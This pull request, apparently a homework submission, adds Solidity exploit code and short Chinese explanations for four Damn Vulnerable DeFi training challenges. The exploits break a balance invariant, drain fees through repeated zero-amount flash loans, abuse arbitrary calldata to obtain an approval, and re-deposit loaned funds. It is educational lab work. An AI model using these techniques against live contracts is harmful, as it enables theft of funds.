### PR TITLE
[HW15] Damn Vulnerable DeFi #1~#4

### DIFF
--- a/test/Levels/naive-receiver/NaiveReceiver.t.sol
+++ b/test/Levels/naive-receiver/NaiveReceiver.t.sol
@@ -48,6 +48,16 @@ contract NaiveReceiver is Test {
         /**
          * EXPLOIT START *
          */
+        naiveReceiverLenderPool.flashLoan(address(flashLoanReceiver), 0);
+        naiveReceiverLenderPool.flashLoan(address(flashLoanReceiver), 0);
+        naiveReceiverLenderPool.flashLoan(address(flashLoanReceiver), 0);
+        naiveReceiverLenderPool.flashLoan(address(flashLoanReceiver), 0);
+        naiveReceiverLenderPool.flashLoan(address(flashLoanReceiver), 0);
+        naiveReceiverLenderPool.flashLoan(address(flashLoanReceiver), 0);
+        naiveReceiverLenderPool.flashLoan(address(flashLoanReceiver), 0);
+        naiveReceiverLenderPool.flashLoan(address(flashLoanReceiver), 0);
+        naiveReceiverLenderPool.flashLoan(address(flashLoanReceiver), 0);
+        naiveReceiverLenderPool.flashLoan(address(flashLoanReceiver), 0);
 
         /**
          * EXPLOIT END *

--- a/test/Levels/side-entrance/SideEntrance.t.sol
+++ b/test/Levels/side-entrance/SideEntrance.t.sol
@@ -36,7 +36,9 @@ contract SideEntrance is Test {
         /**
          * EXPLOIT START *
          */
-
+        vm.startPrank(attacker);
+        ExploitSideEntrance exploit = new ExploitSideEntrance(address(sideEntranceLenderPool));
+        exploit.attack(ETHER_IN_POOL);
         /**
          * EXPLOIT END *
          */
@@ -47,5 +49,28 @@ contract SideEntrance is Test {
     function validation() internal {
         assertEq(address(sideEntranceLenderPool).balance, 0);
         assertGt(attacker.balance, attackerInitialEthBalance);
+    }
+}
+
+contract ExploitSideEntrance {
+    SideEntranceLenderPool pool;
+    address payable attacker;
+
+    constructor(address _pool) {
+        pool = SideEntranceLenderPool(_pool);
+        attacker = payable(msg.sender);
+    }
+
+    function attack(uint256 amount) public {
+        pool.flashLoan(amount);
+        pool.withdraw();
+    }
+
+    function execute() public payable {
+        pool.deposit{value: address(this).balance}();
+    }
+
+    receive() external payable {
+        attacker.transfer(address(this).balance);
     }
 }

--- a/test/Levels/truster/Truster.t.sol
+++ b/test/Levels/truster/Truster.t.sol
@@ -41,7 +41,10 @@ contract Truster is Test {
         /**
          * EXPLOIT START *
          */
-
+        vm.startPrank(attacker);
+        bytes memory data = abi.encodeWithSignature("approve(address,uint256)", attacker, type(uint256).max);
+        trusterLenderPool.flashLoan(0, attacker, address(dvt), data);
+        dvt.transferFrom(address(trusterLenderPool), attacker, dvt.balanceOf(address(trusterLenderPool)));
         /**
          * EXPLOIT END *
          */

--- a/test/Levels/unstoppable/Unstoppable.t.sol
+++ b/test/Levels/unstoppable/Unstoppable.t.sol
@@ -60,6 +60,7 @@ contract Unstoppable is Test {
         /**
          * EXPLOIT START *
          */
+        dvt.transfer(address(unstoppableLender), 1e18);
         /**
          * EXPLOIT END *
          */


### PR DESCRIPTION
1 : Unstoppable
flashloan 會檢查 poolBalance 和 balanceBefore 是否相等，轉入 1 DVT 讓餘額不相等。

2 : Native Receiver
flash loan 傳入 borrow amount 0 每次消耗 fixed fee，直到清空 pool 餘額。

3 : Truster
惡意傳入 approve 最大值的 data，提取 pool 全部餘額。

4 : Side Entrance
在 execute 把錢存到池子裡，通過 flashloan 檢查餘額 address(this).balance >= balanceBefore。